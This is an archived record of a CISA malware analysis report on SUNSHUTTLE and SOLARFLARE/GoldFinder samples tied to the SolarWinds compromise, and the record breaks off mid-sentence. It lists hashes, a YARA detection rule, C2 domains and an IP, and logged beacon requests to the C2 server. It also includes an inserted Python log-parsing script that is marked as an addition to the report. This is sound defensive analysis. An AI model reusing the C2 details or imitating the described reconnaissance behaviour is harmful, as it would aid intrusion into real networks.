{
	"id": "c38c20c4-138b-485c-b2ef-aaa9bea9f26f",
	"created_at": "2026-04-06T00:09:34.507401Z",
	"updated_at": "2026-04-10T13:11:33.527211Z",
	"deleted_at": null,
	"sha1_hash": "ae59e3a21c3da214423167f397d741426dbfd9c3",
	"title": "MAR-10327841-1.v1 – SUNSHUTTLE | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 198625,
	"plain_text": "MAR-10327841-1.v1 – SUNSHUTTLE | CISA\r\nPublished: 2021-04-15 · Archived: 2026-04-05 20:54:45 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.cisa.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security\r\nAgency (CISA) and the Cyber National Mission Force (CNMF) of U.S. Cyber Command. This report provides detailed\r\nanalysis of several malicious samples and artifacts associated with the supply chain compromise of SolarWinds Orion\r\nnetwork management software, attributed by the U.S. Government to the Russian SVR Foreign Intelligence Service (APT\r\n29, Cozy Bear, The Dukes). CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to\r\nmalicious activity. 
This MAR includes suggested response actions and recommended mitigation techniques.\r\nThis report analyzes eighteen (18) files categorized by their associative behavior and structured configurations.\r\nSeven (7) of the analyzed files are executables that attempt to connect to hard-coded command and control (C2) servers\r\nusing Hypertext Transfer Protocol Secure (HTTPS) on port 443 and await a response upon execution.\r\n   • Three (3) executables written in Golang (Go) and packed using the Ultimate Packer for Executables (UPX) were\r\nidentified by the security company FireEye as SOLARFLARE malware. One (1) of which was unpacked and included in\r\nthis report.\r\n   • Four (4) executables written in Go were identified by FireEye as SUNSHUTTLE. Two (2) of which were unpacked and\r\nincluded in this report.\r\nOne (1) file is a text file that appears to be a configuration file for a SUNSHUTTLE sample.\r\nSix (6) files are Visual Basic Script (VBScript) files designed to add the Windows registry keys to store and execute an\r\nobfuscated VBScript to download and execute a malicious payload from its C2 server. The VBScripts were identified as\r\nMISPRINT/SIBOT.\r\nOne (1) file was identified as a China Chopper webshell server-side component. 
The webshell was observed on a network\r\nwith an active SUNSHUTTLE infection, which would provide the actor with an alternative method of accessing the network\r\nif the SUNSHUTTLE infection was remediated.\r\nFor more information on SolarWinds-related activity visit: https://us-cert.cisa.gov/remediating-apt-compromised-networks.\r\nFor a downloadable copy of IOCs, see: MAR-10327841-1.v1.stix\r\nClick here for a PDF version of this report.\r\nSubmitted Files (14)\r\n0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9 (finder.exe)\r\n0d770e0d6ee77ed9d53500688831040b83b53b9de82afa586f20bb1894ee7116 (owafont.aspx)\r\n4e8f24fb50a08c12636f3d50c94772f355d5229e58110cccb3b4835cb2371aec (bootcats.exe)\r\n6b01eeef147d9e0cd6445f90e55e467b930df2de5d74e3d2f7610e80f2c5a2cd (f3.exe)\r\n7e05ff08e32a64da75ec48b5e738181afb3e24a9f1da7f5514c5a11bb067cbfb ( rundll32registry_createremote...)\r\n88cd1bc85e6a57fa254ede18f96566b33cee999c538902aefc5b819d71163d07 (prnmngrz.vbs)\r\n94c58c7fb43153658eaa9409fc78d8741d3c388d3b8d4296361867fe45d5fa45 (Lexicon.exeUnPacked)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 1 of 44\n\nacc74c920d19ea0a5e6007f929ef30b079eb2836b5b28e5ffcc20e68fa707e66 (rundll32registry_schtaskdaily....)\r\nb9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8 (Lexicon.exe)\r\ncb80a074e5fde8d297c2c74a0377e612b4030cc756baf4fff3cc2452ebc04a9c (prndrvrn.vbs)\r\ne9ddf486e5aeac02fc279659b72a1bec97103f413e089d8fabc30175f4cdbf15 (rundll32file_schtaskdaily.vbs)\r\nec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def (SchCachedSvc.exe)\r\nf28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c (WindowsDSVC.exe)\r\nf2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2 (f2.exe)\r\nAdditional Files (4)\r\na9037af30ff270901e9d5c2ee5ba41d547bc19c880f5cb27f50428f9715d318f (Final_vbscript.vbs)\r\nbc7a3b3cfae59f1bfbde57154cb1e7deebdcdf6277ac446919df07e3b8a6e4df 
(runlog.dat.tmp)\r\nd8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d (finder.exe_Unpacked)\r\nfa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836 (WindowsDSVC.exe_Unpacked)\r\nDomains (5)\r\neyetechltd.com\r\nmegatoolkit.com\r\nnikeoutletinc.org\r\nreyweb.com\r\nsense4baby.fr\r\nIPs (1)\r\n185.225.69.69\r\nFindings\r\n0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9\r\nTags\r\ntrojan\r\nDetails\r\nName finder.exe\r\nSize 1940480 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 1d97d76afefaa09556683c2fcd875baa\r\nSHA1 90651ee3dde5fe80ec52f13c487715bb5f04f6b6\r\nSHA256 0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9\r\nSHA512 effca75ac9103f23006efa7fbb8e3fea2a1f426f63d0153bbce286c0262d5a470e206beb0fb6a67ec963fddbd556790bcd0432a96aa8b7ce606\r\nssdeep 49152:o7fPmMDelNw0jQRtsBbsj3IpWrmxkpe14yn8:UWrQRtMpge2yn\r\nEntropy 7.873884\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.284134\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 2 of 44\n\nEmsisoft Gen:Variant.Bulz.284134 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.284134\r\nMicrosoft Security Essentials Trojan:Win64/GoldFinder.A!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n5c227744852a6ceb12cdb8d238e6d89a header 512 2.467962\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n9f091240d6d7fcdcffa6dae025085ffd UPX1 1939456 7.874501\r\n50620caa4cae52ec3a75710e0140e092 UPX2 512 1.661240\r\nRelationships\r\n0affab34d9... Contains d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\nDescription\r\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified as SOLARFLARE/GoldFinder\r\nmalware. 
The executable is UPX packed and when executed, the application will unpack and execute\r\n(d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d) in memory.\r\nd8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\nTags\r\ntrojan\r\nDetails\r\nName finder.exe_Unpacked\r\nSize 4947968 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 86e0f3071c3b3feecf36ea13891633fb\r\nSHA1 9f9f3b73e586e376fd81c6bdb75476fc3d37789c\r\nSHA256 d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\nSHA512 a3cb2771a7fe2419621865230cecf4105e5323e9e99edc7f863b7dea9db0646647b2a83c9e5b99ef0c92a58d890c1fc18069d24f3d3704396\r\nssdeep 49152:F3oUWn0hg/SlNpppOgFq/ANwhtB7ZUgB2SMS9AOE1w5ZRXR5/lTpJ6JwBS5g+A:qpx6bcVywhtB1Tx57X+A\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 3 of 44\n\nEntropy 5.958753\r\nAntivirus\r\nAhnlab Trojan/Win64.Cobalt\r\nBitDefender Gen:Variant.Bulz.284134\r\nEmsisoft Gen:Variant.Bulz.284134 (B)\r\nIkarus Trojan.Crypter\r\nLavasoft Gen:Variant.Bulz.284134\r\nMicrosoft Security Essentials Trojan:Win64/GoldFinder.A!dha\r\nYARA Rules\r\nrule CISA_3P_10327841_01 : SOLARFLARE trojan\r\n{\r\n   meta:\r\n       Author = \"CISA Trusted Third Party\"\r\n       Incident = \"10327841.r1.v1\"\r\n       Date = \"2021-03-04\"\r\n       Actor = \"n/a\"\r\n       Category = \"Trojan\"\r\n       Family = \"SOLARFLARE\"\r\n       Description = \"Detects strings in Finder_exe samples\"\r\n       MD5_1 = \"86e0f3071c3b3feecf36ea13891633fb\"\r\n       SHA256_1 = \"d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\"\r\n   strings:\r\n       $Go_Lang = \"Go build ID:\"\r\n       $main_func = \"main.main\"\r\n       $main_encrypt = \"main.func1\"\r\n       $StatusCode = \"StatusCode:\"\r\n       $Headers = \"Headers:\"\r\n       $Data = \"Data:\"\r\n       $Target = \"Target:\"\r\n   condition:\r\n       (uint16(0) == 0x5A4D) and all of them\r\n}\r\nssdeep Matches\r\nNo matches 
found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash 91802a615b3a5c4bcc05bc5f66a5b219\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nc986ba8e4a156864e2afff2732285838 header 1536 1.243612\r\n4a26b87fa44a548f2d6d6a3d2cf09fb2 .text 2284544 5.911172\r\n46e1b5a3734e729d9bdce0a14120c910 .rdata 2400768 5.329403\r\n952ce42dcbf61c3fac54c2c958e0c551 .data 259072 5.567652\r\n52887da2b4d17327b2d67732484c11c2 .idata 1536 2.877795\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 4 of 44\n\nMD5 Name Raw Size Entropy\r\n07b5472d347d42780469fb2654b7fc54 .symtab 512 0.020393\r\nRelationships\r\nd8009ad960... Connected_To 185.225.69.69\r\nd8009ad960... Contained_Within 0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9\r\nDescription\r\nThe file is an 64-bit Windows executable file. This file is the UPX unpacked sample from the UPX packed sample\r\n\"finder.exe\" (0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9). The application is written in the\r\nGolang (Go) open-source language. The application is designed to detect servers and network redirectors such as network\r\nsecurity devices between the compromised systems and the C2 server. When executed, it attempts to connect to its C2 server\r\nusing HTTPS on port 443. 
Once connection is established, it will log all of the HTTP request and response information\r\nfrom/to the hard-coded C2 in plaintext into \"%current directory%\\loglog.txt\" (Figure 1)\r\nThe malware uses the following hard-coded labels to store the request and response information in the log file:\r\nTarget: The C2 URI\r\nStatusCode: HTTP response/status code\r\nHeaders: HTTP response headers and the values\r\nData: Data from the HTTP response received from the C2\r\nDisplayed below are sample HTTP request sent:\r\n--Begin sample request--\r\nGET / HTTP/1.1\r\nHost: 185.225.69.69\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n--End sample request--\r\nScreenshots\r\nFigure 1 - Screenshot of the log file.\r\n185.225.69.69\r\nTags\r\ncommand-and-control\r\nURLs\r\nhxxps[:]//185.225.69.69/live\r\nPorts\r\n443 TCP\r\nHTTP Sessions\r\nGET / HTTP/1.1\r\nHost: 185.225.69.69\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\nGET /live/ HTTP/1.1\r\nHost: 185.225.69.69\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0\r\nConnection: Keep-Alive\r\nCookie: wDacJ87epY=8aebf98f920a2a198c00d87c246572b9; hBZ38QSGIR7UgOKT=NZQWAvMR6VGKA;\r\n0aUvm7fgB4UB5=IhFr8BnqYbP8ZZg1Zi8VPQWKQTXdRG8q; CLAshlHL1M=114\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 5 of 44\n\nReferer: www[.]google.com    \r\nAccept-Encoding: gzip\r\nWhois\r\ninetnum:        185.225.68.0 - 185.225.71.255\r\nnetname:        HU-XET-20171012\r\ncountry:        HU\r\norg:            ORG-XK7-RIPE\r\nadmin-c:        XL650-RIPE\r\ntech-c:         XL650-RIPE\r\nstatus:         ALLOCATED PA\r\nmnt-by:         RIPE-NCC-HM-MNT\r\nmnt-by:         hu-xet-1-mnt\r\ncreated:        2017-10-12T13:51:43Z\r\nlast-modified: 2017-10-12T13:51:43Z\r\nsource:         RIPE\r\norganisation: ORG-XK7-RIPE\r\norg-name:     XET Kft.\r\ncountry:        HU\r\norg-type:     LIR\r\naddress:        Fraknó u. 
8/B 1/4\r\naddress:        1115\r\naddress:        Budapest\r\naddress:        HUNGARY\r\ne-mail:         info@xethost.com\r\nadmin-c:        XL650-RIPE\r\ntech-c:         XL650-RIPE\r\nabuse-c:        AR43371-RIPE\r\nmnt-ref:        hu-xet-1-mnt\r\nmnt-by:         RIPE-NCC-HM-MNT\r\nmnt-by:         hu-xet-1-mnt\r\ncreated:        2017-10-10T14:51:34Z\r\nlast-modified: 2020-12-16T12:18:59Z\r\nsource:         RIPE\r\nphone:         +36702451572\r\norg:            ORG-XK7-RIPE\r\naddress:        Fraknó u. 8/B 1/4\r\naddress:        1115\r\naddress:        Budapest\r\naddress:        HUNGARY\r\nphone:         +36309374590\r\nnic-hdl:        XL650-RIPE\r\nmnt-by:         hu-xet-1-mnt\r\ncreated:        2017-10-10T14:51:33Z\r\nlast-modified: 2019-10-09T11:32:49Z\r\nsource:         RIPE\r\ne-mail:         support@xethost.com\r\n% Information related to '185.225.68.0/22AS30836'\r\nroute:         185.225.68.0/22\r\ndescr:         Originated to Xethost by 23Net\r\norigin:         AS30836\r\nmnt-by:         hu-xet-1-mnt\r\nmnt-by:         NET23-MNT\r\ncreated:        2017-10-17T13:35:44Z\r\nlast-modified: 2017-10-17T13:35:44Z\r\nsource:         RIPE\r\nRelationships\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 6 of 44\n\n185.225.69.69 Connected_From d8009ad96082a31d074e85dae3761b51a78f99e2cc8179ba305955c2a645b94d\r\n185.225.69.69 Connected_From fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nDescription\r\nFinder.exe (0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9) and WindowsDSVC.exe\r\n(f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c) attempt to connect to this IP address.\r\nf2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2\r\nTags\r\ntrojan\r\nDetails\r\nName f2.exe\r\nSize 1940480 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 f67f71503026181c8499b5709b2b51c4\r\nSHA1 e93278e0e1af7fc2f75fe50318fdba7abe2cec0d\r\nSHA256 
f2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2\r\nSHA512 dc2b788118c5733df1f9addad0d1634eb4d150521a042f0a09726a73cbf3b7682f5ce7a603ffc41871f54fe03c646529559df795586eb6a50c\r\nssdeep 49152:+nHBoTLO0y0UvN+4EK4KnQ4Ub9r0/pVXoUz7NPA6Cl:0HEO0qz4KnQJbV+h7NP+\r\nEntropy 7.874162\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.284134\r\nEmsisoft Gen:Variant.Bulz.284134 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.284134\r\nMicrosoft Security Essentials Trojan:Win64/GoldFinder.A!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n657af7f5c4c96b7699b37a285b3bb95d header 512 2.462581\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\naf51298804473081a36388c4452f0717 UPX1 1939456 7.874774\r\n50620caa4cae52ec3a75710e0140e092 UPX2 512 1.661240\r\nRelationships\r\nf2a8bdf135... Connected_To nikeoutletinc.org\r\nDescription\r\nThis file is a 64-bit Windows executable file written in Golang (Go) and was identified as SOLARFLARE/GoldFinder\r\nmalware. F2.exe is a variant of SOLARFLARE/GoldFinder, a stage 2 environmental analysis tool that was used in tandem\r\nwith SUNSHUTTLE/GoldMax. F2.exe checks the network capabilities of the host machine in order to identify the host as a\r\nfuture platform for SUNSHUTTLE/GoldMax. 
F2.exe is nearly identical to the “finder.exe” sample\n(0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9), differing only in the domain it\ncommunicates with.\nUpon execution, it reaches out to the hard-coded domain nikeoutletinc.org over port 443 while also creating a file in its\nrunning directory called “loglog.txt.” When it receives a 200 OK from the specified domain, the details of the response are\nappended to the “loglog.txt” file and the executable exits. The connection uses HTTPS (TLS 1.2). After\nrunning, f2.exe exits and installs no persistence mechanism, so it does not run again on its own. In the compromise associated\nwith this f2.exe sample, the nearly identical file f3.exe (described below) first generated innocent-looking traffic to google.com\nto prod the network defense posture and determine whether the infected host could reach the internet; f2.exe then performed\nthe role of determining connectivity to the C2 domain nikeoutletinc.org. 
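The following Python script is an added example; it is not part of the CISA report and not code from SOLARFLARE/GoldFinder. It parses a loglog.txt file of the layout the report describes for finder.exe (Target:, StatusCode:, Headers: and Data: labels under Go log timestamps) and shows for f2.exe, including the Go net/http error line written when no connection could be made, and summarises which targets the host actually reached. The sample log content is constructed to match the report's entries (defanged hxxps[:] form kept; a real file carries the live URL); the map[...] header layout and the Get ...: dial tcp error text are Go standard-library output formats; the function and field names are the example's own.

```python
import re

# Added example, not from the CISA report or the malware: parse the loglog.txt
# that SOLARFLARE/GoldFinder writes beside itself (Target:/StatusCode:/Headers:/
# Data: labels under Go log timestamps, plus the Go net/http error line when
# the connection fails) and summarise which targets the host actually reached.

NL, Q = chr(10), chr(34)  # newline and double quote, kept out of the literals

# Constructed sample laid out like the f2.exe entries in the report: one fetch
# answered by an INetSim fake server, then one attempt that could not connect.
# A real file carries the live URL rather than the defanged hxxps[:] form.
SAMPLE_LOGLOG = NL.join([
    '2021/03/17 10:36:35 Target: hxxps[:]//nikeoutletinc.org/',
    '2021/03/17 10:36:35 StatusCode: 200',
    '2021/03/17 10:36:35 Headers: map[Content-Length:[258] Content-Type:[text/html] '
    'Date:[Wed, 17 Mar 2021 14:36:35 GMT] Server:[INetSim HTTPs Server]]',
    '2021/03/17 10:36:35 Data:',
    '2021/03/17 10:36:35',
    '',
    'This is the default HTML page for INetSim HTTP server fake mode.',
    '',
    'This file is an HTML document.',
    '2021/03/17 10:38:46 Get ' + Q + 'hxxps[:]//nikeoutletinc.org/' + Q
    + ': dial tcp 192.168.1.1:443: connectex: No connection could be made '
    'because the target machine actively refused it.',
])

# Go default log prefix (YYYY/MM/DD HH:MM:SS) followed by the message.
TIMESTAMP = re.compile('^([0-9]{4}/[0-9]{2}/[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2})(?: (.*))?$')


def parse_go_map(text):
    '''Turn Go fmt output for http.Header, map[Key:[v1 v2] ...], into a dict.'''
    body = text[4:-1] if text.startswith('map[') and text.endswith(']') else text
    headers, pos = {}, 0
    while True:
        open_at = body.find(':[', pos)
        if open_at < 0:
            break
        close_at = body.find(']', open_at + 2)
        if close_at < 0:
            break
        headers[body[pos:open_at].strip()] = body[open_at + 2:close_at]
        pos = close_at + 1
    return headers


def new_record(stamp, target):
    return {'time': stamp, 'target': target, 'status': None,
            'headers': {}, 'data': [], 'error': None}


def parse_loglog(text):
    '''Return one record per connection attempt, in file order.'''
    records, current = [], None
    for line in text.splitlines():
        match = TIMESTAMP.match(line)
        if match is None:
            # untimestamped lines are the response body echoed after Data:
            if current is not None:
                current['data'].append(line)
            continue
        stamp, rest = match.group(1), match.group(2) or ''
        if not rest:
            continue  # bare timestamp that precedes a multi-line body
        if rest.startswith('Get ' + Q):
            # failure line from Go net/http: Get <quoted url>: <dial error>
            close_q = rest.find(Q, 5)
            failed = new_record(stamp, rest[5:close_q])
            failed['error'] = rest[close_q + 1:].lstrip(': ')
            records.append(failed)
            current = None
            continue
        label, _, value = rest.partition(':')
        value = value.strip()
        if label == 'Target':
            current = new_record(stamp, value)
            records.append(current)
        elif current is None:
            continue
        elif label == 'StatusCode':
            current['status'] = int(value)
        elif label == 'Headers':
            current['headers'] = parse_go_map(value)
        # Data: carries nothing on its own line; the body follows untimestamped
    for record in records:
        record['data'] = NL.join(record['data']).strip()
    return records


def reachability(records):
    '''Per target: status and Server header when reached, the dial error otherwise.'''
    summary = {}
    for record in records:
        if record['error']:
            outcome = 'ERROR ' + record['error']
        else:
            outcome = str(record['status']) + ' ' + record['headers'].get('Server', '-')
        summary.setdefault(record['target'], []).append(outcome)
    return summary


if __name__ == '__main__':
    for target, outcomes in reachability(parse_loglog(SAMPLE_LOGLOG)).items():
        print(target)
        for outcome in outcomes:
            print('   ', outcome)
```

Run it against a loglog.txt recovered from a suspected host; a Server header naming a sandbox or proxy product, or a dial error naming an internal gateway address, is exactly the kind of information the tool was built to collect about the path between the host and the C2.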
This file does not\nneed administrator privileges to run.\nAfter unpacking the sample, displayed below are strings of interest:\n--Begin strings of interest--\nhxxps[:]//nikeoutletinc.org/id (%v) \u003c= evictCount (%v)initSpan: unaligned lengthinvalid port %q after hostinvalid request\ndescriptormalformed HTTP status codemalformed chunked encodingname not unique on networknet/http: request\ncanceledno CSI structure available\nGo build ID:\n\"XoNtlAkjvYqniOio6xGI/0DIub_zdwXYX9I94QTxf/mSa3AXim2woQ8ym8GoD-/H3vqlJigkBWLlKW0U7Eq\"\n--End strings of interest--\nDisplayed below are loglog.txt contents after running f2.exe in a lab environment to mimic network traffic:\n2021/03/17 10:36:35 Target: hxxps[:]//nikeoutletinc.org/\n2021/03/17 10:36:35 StatusCode: 200\n2021/03/17 10:36:35 Headers: map[Content-Length:[258] Content-Type:[text/html] Date:[Wed, 17 Mar 2021 14:36:35\nGMT] Server:[INetSim HTTPs Server]]\n2021/03/17 10:36:35 Data:\n2021/03/17 10:36:35\n\nThis is the default HTML page for INetSim HTTP server fake mode.\n\nThis file is an HTML document.\n\nIf no network connection exists the file will contain:\n2021/03/17 10:38:46 Get \"hxxps[:]//nikeoutletinc.org/\": dial tcp 192.168.1.1:443: connectex: No connection could be made\nbecause the target machine actively refused it.\nnikeoutletinc.org\nTags\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\nPage 8 of 44\n\ncommand-and-control\r\nWhois\r\nDomain Name: NIKEOUTLETINC.ORG\r\nRegistry Domain ID: D402200000007305706-LROR\r\nRegistrar WHOIS Server: whois.namesilo.com\r\nRegistrar URL: www.namesilo.com\r\nUpdated Date: 2020-07-28T09:05:28Z\r\nCreation Date: 2018-08-22T18:44:46Z\r\nRegistry Expiry Date: 2021-08-22T18:44:46Z\r\nRegistrar Registration Expiration Date:\r\nRegistrar: Namesilo, LLC\r\nRegistrar IANA ID: 1479\r\nRegistrar Abuse Contact Email: abuse@namesilo.com\r\nRegistrar Abuse Contact Phone: +1.4805240066\r\nReseller:\r\nDomain Status: clientTransferProhibited 
https://icann.org/epp#clientTransferProhibited\r\nRegistrant Organization: See PrivacyGuardian.org\r\nRegistrant State/Province: AZ\r\nRegistrant Country: US\r\nName Server: NS35.HOSTERBOX.COM\r\nName Server: NS36.HOSTERBOX.COM\r\nDNSSEC: unsigned\r\nURL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)\r\nRelationships\r\nnikeoutletinc.org Connected_From ec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def\r\nnikeoutletinc.org Connected_From f2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2\r\nDescription\r\nf2.exe (f2a8bdf135caca0d7359a7163a4343701a5bdfbc8007e71424649e45901ab7e2) and SchCachedSvc.exe\r\n(ec5f07c169267dec875fdd135c1d97186b494a6f1214fb6b40036fd4ce725def) attempt to connect to this domain.\r\n6b01eeef147d9e0cd6445f90e55e467b930df2de5d74e3d2f7610e80f2c5a2cd\r\nTags\r\ntrojan\r\nDetails\r\nName f3.exe\r\nSize 1939968 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 f50e89488b82622b4dd1a35a599a56ec\r\nSHA1 90b76eb47c0a6a7ccb2017b55cee6df88b55b6bb\r\nSHA256 6b01eeef147d9e0cd6445f90e55e467b930df2de5d74e3d2f7610e80f2c5a2cd\r\nSHA512 b71b488fac96298ad02158854a5227d60d5f5fa1651be1017b6b0f67289e4935bd83544d6cc7df6d6ab54b4fcf5741556d7b75f5d80a0c0ee\r\nssdeep 49152:BuGmlb/p27ls7+X1PgDd/oGKt4A2sPNrEUxw5acD:Klbh27A+Byd/IQs9Eu\r\nEntropy 7.873962\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.284134\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 9 of 44\n\nEmsisoft Gen:Variant.Bulz.284134 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.284134\r\nMicrosoft Security Essentials Trojan:Win64/GoldFinder.A!dha\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n4743b4f0244c6163eb4fa96688360cea header 512 2.464055\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 
0.000000\r\n11eafba3f3e1d220182ee43ca3d5c3ca UPX1 1938944 7.874568\r\n50620caa4cae52ec3a75710e0140e092 UPX2 512 1.661240\r\nDescription\r\nThis file is a 64-bit Windows executable file written in Golang (Go) and was identified as SOLARFLARE/GoldFinder\r\nmalware. F3.exe is a variant of SOLARFLARE/GoldFinder, a stage 2 environmental analysis tool that was used in tandem\r\nwith SUNSHUTTLE/GoldMax. F3.exe checks the network capabilities of the host machine in order to identify the host as a\r\nfuture platform for SUNSHUTTLE/GoldMax. F3.exe is nearly identical to the “finder.exe” sample\r\n(0affab34d950321e3031864ec2b6c00e4edafb54f4b327717cb5b042c38a33c9), differing only in the domain it\r\ncommunicates with. Upon execution, it reaches out to the hard-coded domain google.com over port 443 while also creating a file\r\nin its running directory called “loglog.txt.” When it receives a 200 OK from the specified domain, the details of the response are\r\nappended to the “loglog.txt” file and the executable exits. This tool is meant to generate innocent-looking traffic to prod the\r\nnetwork defense posture and determine whether the infected host is able to reach the internet. Next, another version of\r\n“finder” would be used to determine connectivity to the C2 domain. 
In the compromise associated with this f3.exe sample, a\r\nnearly identical file named f2.exe performed the role of communicating to the C2 domain.\r\nf28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c\r\nTags\r\ntrojan\r\nDetails\r\nName WindowsDSVC.exe\r\nSize 2037248 bytes\r\nType PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows\r\nMD5 e930633b2d99da097ef2dfff6734afab\r\nSHA1 1199a3bd32d9561b2827ed14a2e7d9093936d12f\r\nSHA256 f28491b367375f01fb9337ffc137225f4f232df4e074775dd2cc7e667394651c\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a\r\nPage 10 of 44\n\nSHA512 33203c83637d6e97481b4c8977892acaabade1543f5132f247f356bc7a623c481ae76eab2f8282e7b99a4c6417c9c5c422dfba85d33907aa5\r\nssdeep 49152:bqjCBg/1/zelmQLgGZRx9g4wwA3NnbgsPMfdLqEUI:bOCeFzelhL/TxEwwR0sk1Lqp\r\nEntropy 7.875073\r\nAntivirus\r\nBitDefender Gen:Variant.Bulz.370300\r\nESET a variant of WinGo/Agent.AE trojan\r\nEmsisoft Gen:Variant.Bulz.370300 (B)\r\nIkarus Trojan.Win64.Rozena\r\nLavasoft Gen:Variant.Bulz.370300\r\nMicrosoft Security Essentials Trojan:Win64/GoldMax.A!dha\r\nSophos Mal/GoldMax-A\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 1969-12-31 19:00:00-05:00\r\nImport Hash e58ab46f2a279ded0846d81bf0fa21f7\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nb1ebe7f6d9f68ec788abf985f80220c9 header 512 2.484697\r\nd41d8cd98f00b204e9800998ecf8427e UPX0 0 0.000000\r\n5fe74989ec393ccead259222602d437c UPX1 2036224 7.875650\r\n8b4f623319b09fd4b7d5fcdc5179f6ee UPX2 512 1.763456\r\nRelationships\r\nf28491b367... Contains fa1959dd382ce868c975599c6c3cc536aa0073be44fc8a6571a20fb0c8bea836\r\nDescription\r\nThis file is an 64-bit Windows executable file written in Golang (Go) and was identified 